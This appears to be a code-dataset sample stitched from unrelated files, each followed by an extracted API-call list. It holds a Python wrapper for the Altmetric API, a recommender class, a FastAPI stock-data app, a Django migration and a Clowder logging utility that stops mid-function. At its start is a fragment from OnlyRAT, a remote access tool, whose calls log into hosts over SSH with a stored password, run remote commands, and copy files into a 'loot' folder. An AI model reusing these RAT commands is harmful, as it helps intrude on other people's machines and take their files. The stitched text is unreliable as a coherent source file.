] | [((3657, 3674), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (3672, 3674), False, 'import getpass\n'), ((4961, 4979), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (4970, 4979), False, 'import os\n'), ((5048, 5058), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5056, 5058), False, 'import sys\n'), ((5123, 5137), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5135, 5137), False, 'from datetime import datetime\n'), ((5318, 5377), 'os.system', 'os.system', (['f"""sshpass -p "{password}" ssh onlyrat@{address}"""'], {}), '(f\'sshpass -p "{password}" ssh onlyrat@{address}\')\n', (5327, 5377), False, 'import os\n'), ((5520, 5595), 'os.system', 'os.system', (['f"""sshpass -p "{password}" scp {upload} onlyrat@{address}:{path}"""'], {}), '(f\'sshpass -p "{password}" scp {upload} onlyrat@{address}:{path}\')\n', (5529, 5595), False, 'import os\n'), ((5774, 5804), 'os.system', 'os.system', (['"""mkdir ~/Downloads"""'], {}), "('mkdir ~/Downloads')\n", (5783, 5804), False, 'import os\n'), ((5809, 5895), 'os.system', 'os.system', (['f"""sshpass -p "{password}" scp -r onlyrat@{address}:{path} ~/Downloads"""'], {}), '(\n f\'sshpass -p "{password}" scp -r onlyrat@{address}:{path} ~/Downloads\')\n', (5818, 5895), False, 'import os\n'), ((6065, 6138), 'os.system', 'os.system', (['f"""sshpass -p "{password}" ssh onlyrat@{address} \'{command}\'"""'], {}), '(f\'sshpass -p "{password}" ssh onlyrat@{address} \\\'{command}\\\'\')\n', (6074, 6138), False, 'import os\n'), ((7557, 7602), 'os.system', 'os.system', (['f"""mkdir ~/Downloads/{loot_folder}"""'], {}), "(f'mkdir ~/Downloads/{loot_folder}')\n", (7566, 7602), False, 'import os\n'), ((7607, 7674), 'os.system', 'os.system', (['f"""mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}"""'], {}), "(f'mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}')\n", (7616, 7674), False, 'import os\n'), ((7679, 7722), 'os.system', 'os.system', (['f"""rm -rf ~/Downloads/amETlOMhPo"""'], {}), "(f'rm -rf 
~/Downloads/amETlOMhPo')\n", (7688, 7722), False, 'import os\n'), ((8540, 8585), 'os.system', 'os.system', (['f"""mkdir ~/Downloads/{loot_folder}"""'], {}), "(f'mkdir ~/Downloads/{loot_folder}')\n", (8549, 8585), False, 'import os\n'), ((8590, 8657), 'os.system', 'os.system', (['f"""mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}"""'], {}), "(f'mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}')\n", (8599, 8657), False, 'import os\n'), ((8662, 8705), 'os.system', 'os.system', (['f"""rm -rf ~/Downloads/bNOEXCxyVp"""'], {}), "(f'rm -rf ~/Downloads/bNOEXCxyVp')\n", (8671, 8705), False, 'import os\n'), ((10615, 10742), 'os.system', 'os.system', (['f"""curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt"""'], {}), "(\n f'curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt'\n )\n", (10624, 10742), False, 'import os\n'), ((10957, 10998), 'os.system', 'os.system', (['"""rm -rf ~/.OnlyRAT/latest.txt"""'], {}), "('rm -rf ~/.OnlyRAT/latest.txt')\n", (10966, 10998), False, 'import os\n'), ((11793, 11823), 'os.system', 'os.system', (['"""rm -rf ~/.OnlyRAT"""'], {}), "('rm -rf ~/.OnlyRAT')\n", (11802, 11823), False, 'import os\n'), ((11294, 11340), 'os.system', 'os.system', (['f"""sh ~/.OnlyRAT/payloads/update.sh"""'], {}), "(f'sh ~/.OnlyRAT/payloads/update.sh')\n", (11303, 11340), False, 'import os\n'), ((13071, 13167), 'os.system', 'os.system', (['f"""sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}"""'], {}), "(\n f'sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}'\n )\n", (13080, 13167), False, 'import os\n'), ((16880, 16922), 'os.system', 'os.system', (['f"""cat {local_path}/version.txt"""'], {}), "(f'cat {local_path}/version.txt')\n", (16889, 16922), False, 'import os\n'), ((17507, 17607), 'os.system', 'os.system', (['f"""xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md"""'], {}), "(\n 
f'xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md'\n )\n", (17516, 17607), False, 'import os\n'), ((17884, 17901), 'os.system', 'os.system', (['option'], {}), '(option)\n', (17893, 17901), False, 'import os\n')] |
"""
PyAltmetric
This is a python wrapper for the Altmetric API.
For more information on the Altmetric API visit http://api.altmetric.com/.
Some pieces of this library were inspired by or derived from the altmetric api
wrapper altmetric.py which is licensed under the MIT open source license.
If you display Altmetric data please attribute Altmetric somewhere on your
page.
"""
import requests
import datetime
import warnings
import json
class AltmetricException(Exception):
    """Root of the pyaltmetric exception hierarchy."""
class JSONParseException(AltmetricException):
    """Raised when an HTTP response body cannot be decoded as JSON,
    typically because the endpoint returned an unexpected format."""
class AltmetricHTTPException(AltmetricException):
    """Raised for HTTP-level failures; known status codes map to messages."""

    # human-readable messages for the status codes Altmetric documents
    _MESSAGES = {
        403: "You are not authorized for this call.",
        420: "Rate Limit Reached",
        502: "API is down.",
    }

    def __init__(self, status_code):
        # unknown codes fall back to the raw status code itself
        super(AltmetricHTTPException, self).__init__(
            self._MESSAGES.get(status_code, status_code)
        )
class IncorrectInput(AltmetricException):
    """Raised when a caller supplies a malformed query argument."""
    def __init__(self, msg):
        super(IncorrectInput, self).__init__(msg)
class Altmetric(object):
    """Thin client for the Altmetric HTTP API (tested against v1)."""
    def __init__(self, api_key = None, api_version = 'v1'):
        """Cache API key and version."""
        self._api_version = api_version
        if self._api_version != 'v1':
            warnings.warn("This wrapper has only been tested with API v1."
                "If you try another version it will probably break.")
        self._api_url = "http://api.altmetric.com/%s/" % self.api_version
        # empty dict means "no key"; update() below is then a no-op
        self._api_key = {}
        if api_key:
            self._api_key = {'key': api_key}

    #Make articles
    def article_from_doi(self, doi):
        """Create an Article object using DOI."""
        raw_json = self._get_altmetrics('doi', doi)
        return self._create_article(raw_json)

    def article_from_pmid(self, pmid):
        """Create an Article object using PMID."""
        raw_json = self._get_altmetrics('pmid', pmid)
        return self._create_article(raw_json)

    def article_from_altmetric(self, altmetric_id):
        """Create an Article object using Altmetric ID."""
        warnings.warn("Altmetric ID's are subject to change.")
        raw_json = self._get_altmetrics('id', altmetric_id)
        return self._create_article(raw_json)

    def article_from_ads(self, ads_bibcode):
        """Create an Article object using ADS Bibcode."""
        raw_json = self._get_altmetrics('ads', ads_bibcode)
        return self._create_article(raw_json)

    def article_from_arxiv(self, arxiv_id):
        """Create an Article object using arXiv ID."""
        raw_json = self._get_altmetrics('arxiv', arxiv_id)
        return self._create_article(raw_json)

    def articles_from_timeframe(self, timeframe, page = 1, num_results = 100,
        doi_prefix = None, nlmid = None, subjects = None, cited_in = None):
        """
        Return articles with mentions within a certain timeframe keyword
        arguments can further limit the search.

        Yields Article objects one page at a time until the API returns an
        empty response (the 404/400 case mapped to {} below).

        :param timeframe: Argument for past x days/months/years. In format:
            1d, 1m, 1y...
        :param page: Integer. Which page of results you are on.
        :param num_results: 1-100. Number of results per page.
        :param doi_prefix: Limits results to those with this doi prefix.
        :param nlmid: List of journal NLM IDs.
        :param subjects: List of slugified journal subjects, accepts NLM
            subject ontology term(s).
        :param cited_in: Options of facebook, blogs, linkedin, video,
            pinterest, gplus,twitter, reddit, news, f1000, rh, qna,
            forum, peerreview.
        """
        timeframe = self._check_timeframe(timeframe)
        while(1):
            raw_json = self._get_altmetrics('citations', timeframe,
                    page = page, num_results = num_results,
                    doi_prefix = doi_prefix, nlmid = nlmid,
                    subjects = subjects, cited_in = cited_in)
            page += 1
            if not raw_json:
                break
            for result in raw_json.get('results', []):
                yield self._create_article(result)

    def _get_altmetrics(self, method, *args, **kwargs):
        """
        Request information from Altmetric. Return a dictionary.

        Returns {} for 404/400 responses; raises AltmetricHTTPException
        for any other non-200 status.
        """
        request_url = self.api_url + method + "/" + "/".join([a for a in args])
        params = kwargs or {}
        params.update(self.api_key)
        response = requests.get(request_url, params = params)
        if response.status_code == 200:
            try:
                return response.json()
            except ValueError as e:
                # NOTE(review): e.message is Python-2-only; raises
                # AttributeError on Python 3
                raise JSONParseException(e.message)
        elif response.status_code in (404, 400):
            return {}
        else:
            raise AltmetricHTTPException(response.status_code)

    def _create_article(self, json):
        """Return an article object, or None for empty/invalid input."""
        try:
            return Article(json)
        except AttributeError:
            return None

    def _check_timeframe(self, timeframe):
        # normalize long forms ("1 day", "all time") to the short codes
        # the API accepts, then validate against the allowed set
        if len(timeframe) > 2:
            if timeframe == 'all time':
                timeframe = 'at'
            else:
                timeframe = timeframe[0]+timeframe[2]
        if timeframe not in [
            'at','1d','2d','3d','4d','5d','6d','1w','1m','3m','6m','1y']:
            raise IncorrectInput("Invalid timeframe entered.")
        return timeframe

    @property
    def api_version(self):
        return self._api_version

    @property
    def api_url(self):
        return self._api_url

    @property
    def api_key(self):
        return self._api_key
class Article():
def __init__(self, raw_dict):
"""
Create an article object. Get raw dictionary from
Altmetrics JSON. Parse dictionary into attributes.
"""
if raw_dict:
self._raw = raw_dict
self._parse_raw()
else:
raise AttributeError
@classmethod
def from_json_file(cls, filename):
"""Return article from filename or path."""
try:
with open(filename) as fi:
raw = json.load(fi)
obj = Article(raw)
return obj
except ValueError as e:
raise JSONParseException(e.message)
@classmethod
def from_json(cls, file_):
"""Return an article from file."""
try:
raw = json.load(file_)
obj = Article(raw)
return obj
except ValueError as e:
raise JSONParseException(e.message)
    def _parse_raw(self):
        """Extract all attributes from raw dictionary.

        Every field is read with .get(), so missing keys become None (or
        the empty default shown), never a KeyError.
        """
        #Article Info
        self._title = self._raw.get('title')
        self._abstract = self._raw.get('abstract')
        self._abstract_source = self._raw.get('abstract_source')
        self._journal = self._raw.get('journal')
        self._subjects = self._raw.get('subjects', [])
        self._added_on = self._convert_to_datetime(self._raw.get('added_on'))
        self._published_on = self._convert_to_datetime(
            self._raw.get('published_on'))
        self._url = self._raw.get('url')
        self._is_open_access = self._raw.get('is_oa')
        self._scopus_subjects = self._raw.get('scopus_subjects', [])
        self._publisher_subjects = self._parse_publisher_subjects\
            (self._raw.get('publisher_subjects',[]))
        self._taglines = self._raw.get('tq', [])

        #Various ID's
        self._doi = self._raw.get('doi')
        self._nlmid = self._raw.get('nlmid')
        self._pmid = self._raw.get('pmid')
        self._altmetric_id = str(self._raw.get('altmetric_id', ""))
        self._arxiv_id = self._raw.get('arxiv_id')
        self._ads_id = self._raw.get('ads_id')
        self._issns = self._raw.get('issns', [])

        #Altmetrics
        self._score = self._raw.get('score')
        self._score_history = self._parse_score_history(
            self._raw.get('history', {}))
        self._score_context = self._parse_score_context(
            self._raw.get('context', {}))
        self._last_updated = self._convert_to_datetime(
            self._raw.get('last_updated'))
        self._schema = self._raw.get('schema')#schema for what?
        self._cited_by_facebook_walls_count = self._raw.get(
            'cited_by_fbwalls_count')
        self._cited_by_redits_count = self._raw.get('cited_by_rdts_count')
        self._cited_by_tweeters_count = self._raw.get(
            'cited_by_tweeters_count')
        self._cited_by_google_plus_count = self._raw.get(
            'cited_by_gplus_count')
        self._cited_by_msm_count = self._raw.get('cited_by_msm_count')
        self._cited_by_delicious_count = self._raw.get('cited_by_delicious_count')
        self._cited_by_qs_count = self._raw.get('cited_by_qs_count')
        self._cited_by_posts_count = self._raw.get('cited_by_posts_count')
        # two alternative key spellings are accepted for the account count
        self._cited_by_accounts_count = (
            self._raw.get('cited_by_accounts_count')
            or self._raw.get('by_accounts_count')
        )
        self._cited_by_forums_count = self._raw.get('cited_by_forums_count')
        self._cited_by_peer_review_sites_count = self._raw.get(
            'cited_by_peer_review_sites_count')
        self._cited_by_feeds_count = self._raw.get('cited_by_feeds_count')
        self._cited_by_videos_count = self._raw.get('cited_by_videos_count')
        self._cohorts = self._raw.get('cohorts', {})
        self._readers_count = self._raw.get('readers_count')
        self._readers = self._raw.get('readers', {})
        self._altmetric_details_url = self._raw.get('details_url',)
        self._altmetric_images = self._raw.get('images', {})
def _parse_score_history(self, history):
"""Make the score_history dictionary a little more readable."""
new_dictionary = {}
if history:
change = {'d':'day','m':'month','w':'week','y':'year'}
for item in history:
if item == 'at':
date = "all time"
else:
if item[0] == '1':
date = "past " + change[item[1]]
else:
date = "past " + item[0]+ " " + change[item[1]]+"s"
new_dictionary[date] = history[item]
return new_dictionary
def _convert_to_datetime(self, unix_time):
"""Convert UNIX timestamp to a datetime object."""
if isinstance(unix_time, int):
return datetime.datetime.fromtimestamp(unix_time)
def _parse_publisher_subjects(self, subjects):
"""
Turns the publisher_subjects list of dictionaries into a list of
subjects.
"""
new_subjects = []
if subjects:
for item in subjects:
new_subjects.append(item['name'])
return new_subjects
def _parse_score_context(self, context):
"""
Change the names of the dictionaries in context to make more sense.
"""
new_context = {}
if context:
new_context['all'] = context.get(
'all', {})
new_context['journal age'] = context.get(
'similar_age_journal_3m', {})
new_context['context age'] = context.get(
'similar_age_3m', {})
new_context['journal'] = context.get('journal', {})
return new_context
    def __repr__(self):
        # NOTE(review): Python 2 idiom — on Python 3 encode() returns
        # bytes, but __repr__ must return str (raises TypeError there).
        return self.title[:12].encode('UTF-8')

    def __str__(self):
        # NOTE(review): uses the Python-2-only `unicode` builtin; this
        # whole method fails with NameError on Python 3.
        string = u""
        for item in self._raw:
            string += unicode(item) + u": " + unicode(self._raw[item]) + u'\n'
        return unicode(string).encode('UTF-8')
    #Basic info — read-only accessors over the fields set in _parse_raw();
    # missing fields surface as None (or the empty default).
    @property
    def raw_dictionary(self):
        return self._raw

    @property
    def title(self):
        return self._title

    @property
    def abstract(self):
        return self._abstract

    @property
    def abstract_source(self):
        return self._abstract_source

    @property
    def journal(self):
        return self._journal

    @property
    def subjects(self):
        """Return a list of related subjects"""
        return self._subjects

    @property
    def scopus_subjects(self):
        """Return a list of Scopus subjects"""
        return self._scopus_subjects

    @property
    def publisher_subjects(self):
        """Return a list of related subjects."""
        return self._publisher_subjects

    @property
    def added_on(self):
        return self._added_on

    @property
    def published_on(self):
        return self._published_on

    @property
    def url(self):
        return self._url

    @property
    def is_open_access(self):
        return self._is_open_access

    @property
    def taglines(self):
        """Return a list of related phrases"""
        return self._taglines

    #Various ID's
    @property
    def doi(self):
        return self._doi

    @property
    def nlmid(self):
        return self._nlmid

    @property
    def pmid(self):
        return self._pmid

    @property
    def altmetric_id(self):
        """Altmetric's own identifier, always returned as a string."""
        return self._altmetric_id

    @property
    def arxiv_id(self):
        return self._arxiv_id

    @property
    def ads_id(self):
        return self._ads_id

    @property
    def issns(self):
        """A list of issns."""
        return self._issns
#Altmetrics
@property
def score(self):
return self._score
@property
def score_history(self):
"""
Return dictionry of Altmetric scores for time periods
such as 'past day', 'past 3 days', 'past month', 'past year',
and 'all time' looking only at that time period.
"""
return self._score_history
@property
def last_updated(self):
"""Return when the Altmetrics were last updated."""
return self._last_updated
@property
def score_context(self):
"""
Return a dictionary that allows you to compare an article's popularity
to articles of a 'similar age'(published within 6 weeks on either
side), articles in journals of a 'similar age', and other articles in
the same 'journal'.
"""
return self._score_context
#Cited by
#Returns count of unique authors for posts cited on various medias.
@property
def cited_by_facebook_walls_count(self):
"""
Return number of posts made on public facebook walls mentioning chosen
article.
"""
return self._cited_by_facebook_walls_count
@property
def cited_by_redits_count(self):
return self._cited_by_redits_count
@property
def cited_by_tweeters_count(self):
return self._cited_by_tweeters_count
@property
def cited_by_google_plus_count(self):
return self._cited_by_google_plus_count
@property
def cited_by_msm_count(self):
"""Return number of citations from articles in science news outlets."""
return self._cited_by_msm_count
@property
def cited_by_delicious_count(self):
return self._cited_by_delicious_count
@property
def cited_by_qs_count(self):
"""
Return number of citations from questions, answers or comments on Stack
Exchange sites (inc. Biostar).
"""
return self._cited_by_qs_count
@property
def cited_by_posts_count(self):
return self._cited_by_posts_count
@property
def cited_by_forums_count(self):
return self._cited_by_forums_count
@property
def cited_by_feeds_count(self):
return self._cited_by_feeds_count
@property
def cited_by_peer_review_sites_count(self):
return self._cited_by_peer_review_sites_count
@property
def cited_by_accounts_count(self):
return self._cited_by_accounts_count
@property
def cited_by_videos_count(self):
return self._cited_by_videos_count
@property
def readers_count(self):
return self._readers_count
    @property
    def readers(self):
        """
        Return a dictionary mapping reference-manager site names to the
        number of readers on each site.
        Ex. {'mendeley': 11, 'citeulike': 0, 'connotea': 4}
        """
        return self._readers
    @property
    def cohorts(self):
        """
        Return a dictionary with the number of people mentioning this article
        who are members of the public (pub), practitioners (doc), research
        scientists (sci) or science communicators (com).
        (This is an experimental Altmetric feature.)
        """
        return self._cohorts
    @property
    def schema(self):
        """Return the raw 'schema' field of the Altmetric data."""
        # NOTE(review): presumably identifies the version of the Altmetric
        # response schema -- confirm against the API documentation.
        return self._schema
    @property
    def altmetric_details_url(self):
        """Return the URL of the article's details page on altmetric.com."""
        return self._altmetric_details_url
    @property
    def altmetric_images(self):
        """
        Return a dictionary of the Altmetric score badge image, keyed by
        size: 'small', 'medium', and 'large'.
        """
        return self._altmetric_images | [
"warnings.warn",
"json.load",
"datetime.datetime.fromtimestamp",
"requests.get"
] | [((2362, 2416), 'warnings.warn', 'warnings.warn', (['"""Altmetric ID\'s are subject to change."""'], {}), '("Altmetric ID\'s are subject to change.")\n', (2375, 2416), False, 'import warnings\n'), ((4671, 4711), 'requests.get', 'requests.get', (['request_url'], {'params': 'params'}), '(request_url, params=params)\n', (4683, 4711), False, 'import requests\n'), ((1531, 1654), 'warnings.warn', 'warnings.warn', (['"""This wrapper has only been tested with API v1.If you try another version it will probably break."""'], {}), "(\n 'This wrapper has only been tested with API v1.If you try another version it will probably break.'\n )\n", (1544, 1654), False, 'import warnings\n'), ((6642, 6658), 'json.load', 'json.load', (['file_'], {}), '(file_)\n', (6651, 6658), False, 'import json\n'), ((10766, 10808), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['unix_time'], {}), '(unix_time)\n', (10797, 10808), False, 'import datetime\n'), ((6363, 6376), 'json.load', 'json.load', (['fi'], {}), '(fi)\n', (6372, 6376), False, 'import json\n')] |
from course_lib.Base.BaseRecommender import BaseRecommender
import numpy as np
import scipy.sparse as sps
class SearchFieldWeightICMRecommender(BaseRecommender):
    """Wrapper recommender that reweights groups of ICM feature columns.

    ``item_feature_to_range_mapper`` maps each named feature field to a
    ``(start, end)`` column range of the ICM.  ``fit`` multiplies every range
    by its requested weight, then trains an instance of ``recommender_class``
    on the reweighted ICM and delegates all scoring to it.
    """

    RECOMMENDER_NAME = "SearchFieldWeightICMRecommender"

    def __init__(self, URM_train, ICM_train, recommender_class: classmethod, recommender_par: dict,
                 item_feature_to_range_mapper: dict, verbose=True):
        super(SearchFieldWeightICMRecommender, self).__init__(URM_train, verbose=verbose)
        self.recommender_class = recommender_class
        self.recommender_par = recommender_par
        self.item_feature_to_range_mapper = item_feature_to_range_mapper
        self.ICM_train: sps.csr_matrix = ICM_train
        self.model = None

    def fit(self, **field_weights):
        # Start from a neutral all-ones weight per ICM column, then scale each
        # field's column range by its weight.
        column_weights = np.ones(shape=self.ICM_train.shape[1])
        for field_name, field_weight in field_weights.items():
            begin, stop = self.item_feature_to_range_mapper[field_name]
            column_weights[begin:stop] = column_weights[begin:stop] * field_weight
        # Right-multiplying by a diagonal matrix rescales the ICM columns.
        self.ICM_train = self.ICM_train.dot(sps.diags(column_weights))
        self.model = self.recommender_class(self.URM_train, self.ICM_train)
        self.model.fit(**self.recommender_par)

    def _compute_item_score(self, user_id_array, items_to_compute=None):
        # Scoring is delegated entirely to the wrapped, already-fitted model.
        return self.model._compute_item_score(user_id_array=user_id_array, items_to_compute=items_to_compute)

    def save_model(self, folder_path, file_name=None):
        # Persistence is intentionally not implemented for this wrapper.
        pass
| [
"numpy.ones",
"scipy.sparse.diags"
] | [((846, 884), 'numpy.ones', 'np.ones', ([], {'shape': 'self.ICM_train.shape[1]'}), '(shape=self.ICM_train.shape[1])\n', (853, 884), True, 'import numpy as np\n'), ((1138, 1169), 'scipy.sparse.diags', 'sps.diags', (['item_feature_weights'], {}), '(item_feature_weights)\n', (1147, 1169), True, 'import scipy.sparse as sps\n')] |
import datetime
import json
import pandas as pd
import yfinance as yf
from yahoofinancials import YahooFinancials
from fastapi import FastAPI
app = FastAPI()
@app.get("/stock/{ticker}")
async def get_stock_data(ticker: str):
    """Return a snapshot of today's market data for *ticker*.

    Pulls the yfinance info dict and exposes a fixed subset of it under
    stable response keys (raises KeyError if yfinance omits a field).
    """
    info = yf.Ticker(ticker).info
    # response key -> yfinance info key
    field_map = {
        "open": "open",
        "high": "dayHigh",
        "low": "dayLow",
        "volume": "volume",
        "forwardPE": "forwardPE",
        "forwardEps": "forwardEps",
    }
    return {response_key: info[source_key] for response_key, source_key in field_map.items()}
# This needs to be completed!
@app.get("/stock/historic/{ticker}")
async def get_historical_data(ticker: str, tperiod: str = "1mo"):
    """Return historical OHLCV data for *ticker* keyed by ISO timestamp.

    Valid periods: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo
    """
    history_frame = yf.Ticker(ticker).history(period=tperiod)
    serialized = history_frame.to_json(orient="index", date_format="iso")
    return json.loads(serialized)
@app.get("/stock/data-options/{ticker}")
async def get_data_options(ticker: str):
    """Return the full option chain for *ticker* as a JSON records string.

    For every listed expiration the calls and puts are fetched, stamped with
    their expiration date, and concatenated.  Derived columns:

    * ``expirationDate`` -- shifted by +1 day (yfinance reports these chains
      with the wrong expiration date).
    * ``dte`` -- time to expiration expressed in years.
    * ``CALL`` -- True when the contract symbol denotes a call.
    * ``mark`` -- midpoint of bid and ask.

    Constant / meaningless columns are dropped before serialising.
    """
    tk = yf.Ticker(ticker)
    exps = tk.options

    # FIX: DataFrame.append was removed in pandas 2.x (and was quadratic);
    # collect per-expiration frames and concatenate once instead.
    chains = []
    for expiration in exps:
        chain = tk.option_chain(expiration)
        frame = pd.concat([chain.calls, chain.puts], ignore_index=True)
        frame["expirationDate"] = expiration
        chains.append(frame)
    options = pd.concat(chains, ignore_index=True) if chains else pd.DataFrame()

    # Bizarre error in yfinance that gives the wrong expiration date:
    # add 1 day to get the correct expiration date.
    options["expirationDate"] = pd.to_datetime(
        options["expirationDate"]
    ) + datetime.timedelta(days=1)
    options["dte"] = (
        options["expirationDate"] - datetime.datetime.today()
    ).dt.days / 365

    # Boolean column: True if the option is a CALL.
    options["CALL"] = options["contractSymbol"].str[4:].apply(lambda x: "C" in x)

    options[["bid", "ask", "strike"]] = options[["bid", "ask", "strike"]].apply(
        pd.to_numeric
    )
    options["mark"] = (
        options["bid"] + options["ask"]
    ) / 2  # Midpoint of the bid-ask spread.

    # Drop unnecessary and meaningless columns.
    options = options.drop(
        columns=[
            "contractSize",
            "currency",
            "change",
            "percentChange",
            "lastTradeDate",
            "lastPrice",
        ]
    )
    pd.set_option("display.max_rows", 1500)
    return options.to_json(orient="records")
@app.get("/stock/futures-data/{ticker}")
async def get_futures_data(ticker: str):
    """Return ten years (2008-09-15 .. 2018-09-15) of daily historical
    prices for *ticker* via yahoofinancials, serialised as a JSON string.

    NOTE(review): returning a pre-serialised string means FastAPI will JSON
    encode it again, so the client receives a quoted string body -- confirm
    whether raw JSON was intended.
    """
    yahoo_financials_commodities = YahooFinancials(ticker)
    daily_commodity_prices = yahoo_financials_commodities.get_historical_price_data(
        '2008-09-15', '2018-09-15', 'daily')
    futures_data = json.dumps(daily_commodity_prices, indent=4)
    return futures_data | [
"fastapi.FastAPI",
"json.dumps",
"pandas.set_option",
"datetime.timedelta",
"datetime.datetime.today",
"pandas.DataFrame",
"yahoofinancials.YahooFinancials",
"yfinance.Ticker",
"pandas.to_datetime"
] | [((150, 159), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (157, 159), False, 'from fastapi import FastAPI\n'), ((1120, 1137), 'yfinance.Ticker', 'yf.Ticker', (['ticker'], {}), '(ticker)\n', (1129, 1137), True, 'import yfinance as yf\n'), ((1213, 1227), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (1225, 1227), True, 'import pandas as pd\n'), ((2403, 2442), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(1500)'], {}), "('display.max_rows', 1500)\n", (2416, 2442), True, 'import pandas as pd\n'), ((2631, 2654), 'yahoofinancials.YahooFinancials', 'YahooFinancials', (['ticker'], {}), '(ticker)\n', (2646, 2654), False, 'from yahoofinancials import YahooFinancials\n'), ((2801, 2845), 'json.dumps', 'json.dumps', (['daily_commodity_prices'], {'indent': '(4)'}), '(daily_commodity_prices, indent=4)\n', (2811, 2845), False, 'import json\n'), ((247, 264), 'yfinance.Ticker', 'yf.Ticker', (['ticker'], {}), '(ticker)\n', (256, 264), True, 'import yfinance as yf\n'), ((1588, 1629), 'pandas.to_datetime', 'pd.to_datetime', (["options['expirationDate']"], {}), "(options['expirationDate'])\n", (1602, 1629), True, 'import pandas as pd\n'), ((1646, 1672), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1664, 1672), False, 'import datetime\n'), ((907, 924), 'yfinance.Ticker', 'yf.Ticker', (['ticker'], {}), '(ticker)\n', (916, 924), True, 'import yfinance as yf\n'), ((1732, 1757), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1755, 1757), False, 'import datetime\n'), ((1294, 1308), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (1306, 1308), True, 'import pandas as pd\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-03-28 06:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Blog schema changes: add a read counter to Post and allow blank
    values on the link and video fields.
    """
    dependencies = [
        ('blog', '0004_auto_20180314_1027'),
    ]
    operations = [
        migrations.AddField(
            model_name='post',
            name='okunmasayisi',  # Turkish for "read count" -- page-view counter
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='post',
            name='link',
            field=models.URLField(blank=True),
        ),
        migrations.AlterField(
            model_name='post',
            name='video',
            field=models.FileField(blank=True, upload_to='BlogVideo'),
        ),
    ]
| [
"django.db.models.URLField",
"django.db.models.FileField",
"django.db.models.IntegerField"
] | [((400, 430), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (419, 430), False, 'from django.db import migrations, models\n'), ((548, 575), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)'}), '(blank=True)\n', (563, 575), False, 'from django.db import migrations, models\n'), ((694, 745), 'django.db.models.FileField', 'models.FileField', ([], {'blank': '(True)', 'upload_to': '"""BlogVideo"""'}), "(blank=True, upload_to='BlogVideo')\n", (710, 745), False, 'from django.db import migrations, models\n')] |
"""Clowder Utils
This module contains utilities that make it easier to work with clowder.
Amongst these utilities is a simple way to initialize the logging system
from either a file or the command line.
"""
import datetime
import json
import logging
import logging.config
import os
import time
import zipfile
import tempfile
import requests
from enum import Enum
import yaml
# This takes advantage of the fact that 0 == False and anything else == True,
# so a CheckMessage value can be used directly in a boolean test.
# pylint: disable=too-few-public-methods
class CheckMessage(Enum):
    """Value to be returned from check_message function.

    Based on the result the following actions will happen:
    - ignore : the process_message function is not called
    - download : the input file will be downloaded and process_message is called
    - bypass : the file is NOT downloaded but process_message is still called
    """
    ignore = 0  # falsy by design -- see comment above the class
    download = 1
    bypass = 2
class StatusMessage(Enum):
    """Value of status to be sent to status_update function.

    Extractors can still define custom content in the message field
    of that function, but the status itself must be one of these. The
    full string sent over the wire will be "STATUS: MESSAGE".
    """
    start = "START"
    processing = "PROCESSING"
    done = "DONE"
    error = "ERROR"
def iso8601time():
    """Return the current local time as an ISO-8601 string with UTC offset.

    Example: ``2024-05-01T12:34:56+02:00``.  Microseconds are dropped.

    The previous implementation derived the offset from ``time.timezone`` /
    ``time.altzone`` keyed on ``time.daylight``, which (a) selected the DST
    offset whenever DST is *defined* for the zone rather than currently
    *active*, and (b) formatted fractional hours with ``{:+06.2f}`` so that
    half-hour zones such as +05:30 were rendered as "+05:50".  Using a
    timezone-aware datetime fixes both.
    """
    now = datetime.datetime.now().astimezone().replace(microsecond=0)
    return now.isoformat()
def setup_logging(config_info=None):
    """Configure the logging system from *config_info*.

    Accepted values for ``config_info``:

    * an ``http(s)://`` URL -- the config file is downloaded to a temporary
      file first, then handled like a local file,
    * a path to a ``.yml``/``.json`` file (parsed and fed to ``dictConfig``)
      or any other config file (fed to ``fileConfig``),
    * a JSON string containing the configuration (fed to ``dictConfig``),
    * ``None`` -- a basic default configuration is installed.

    In every case the noisy requests/urllib3 connection-pool logger is
    capped at WARN afterwards.

    Args:
        config_info (string): either a file on disk, a URL, or a json string
            that has the logging configuration as json.
    """
    temp_path = None
    if config_info:
        # If the logging config is a URL, download it to a temp file first.
        if config_info.startswith(("http://", "https://")):
            r = requests.get(config_info)
            r.raise_for_status()
            # BUG FIX: mkstemp() returns (fd, path); the old code kept the fd
            # and later used it as the file *path*, breaking every URL
            # download.  Also write in binary mode, since iter_content yields
            # bytes.
            fd, temp_path = tempfile.mkstemp()
            with os.fdopen(fd, "wb") as tmp:
                for chunk in r.iter_content(chunk_size=1024):
                    tmp.write(chunk)
            config_info = temp_path
        if os.path.isfile(config_info):
            if config_info.endswith('.yml'):
                with open(config_info, 'r') as configfile:
                    config = yaml.safe_load(configfile)
                logging.config.dictConfig(config)
            elif config_info.endswith('.json'):
                with open(config_info, 'r') as configfile:
